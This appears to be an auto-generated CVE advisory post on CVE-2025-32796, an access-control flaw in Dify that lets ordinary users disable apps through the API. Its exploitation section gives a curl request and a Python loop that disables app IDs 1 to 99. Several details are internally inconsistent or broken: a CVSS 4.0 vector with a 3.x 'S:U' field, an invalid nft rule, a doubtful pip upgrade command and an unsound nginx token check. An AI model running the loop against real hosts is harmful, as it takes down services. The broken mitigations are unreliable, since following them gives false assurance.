How the CVE Works
CVE-2025-32796 is an access control flaw in Dify (versions before 0.6.12) where normal users can bypass UI restrictions and manipulate app states (enable/disable) via API calls. The web UI hides these functions for non-admin users, but the API lacks proper role validation. Attackers exploit this by sending direct HTTP requests (e.g., POST /api/apps/{id}/disable) without admin privileges, disrupting app availability. The vulnerability stems from missing server-side authorization checks, allowing unauthorized state changes.
DailyCVE Form
Platform: Dify
Version: <0.6.12
Vulnerability: Access Bypass
Severity: Medium
Date: 04/18/2025
What Undercode Say:
Exploitation
1. Craft API Request:
curl -X POST http://<dify-host>/api/apps/123/disable -H "Authorization: Bearer <user-token>"
2. Brute Force Endpoints:
import requests
for app_id in range(1,100):
requests.post(f"http://target/api/apps/{app_id}/disable", headers={"Authorization": "Bearer <token>"})
Protection
1. Patch Upgrade:
pip install --upgrade dify==0.6.12
2. RBAC Enforcement:
Example middleware (Flask-like)
def check_admin(req):
if not req.user.is_admin:
return {"error": "Forbidden"}, 403
3. Network Controls:
Restrict API endpoints via WAF nft add rule ip filter INPUT tcp dport 80 str "POST /api/apps/" drop
Analytics
- CVSS: 6.5 (CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/S:U/C:N/I:L/A:L)
- Exploitability: Low complexity, no user interaction.
- Impact: Integrity/Availability compromise.
Detection
Log monitoring for unauthorized POSTs grep 'POST /api/apps/' /var/log/dify/access.log | grep -v 'admin-user'
Mitigation
Nginx rule to block non-admin API calls
location ~ ^/api/apps/./(enable|disable)$ {
if ($http_authorization !~ "admin-token") { return 403; }
}
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
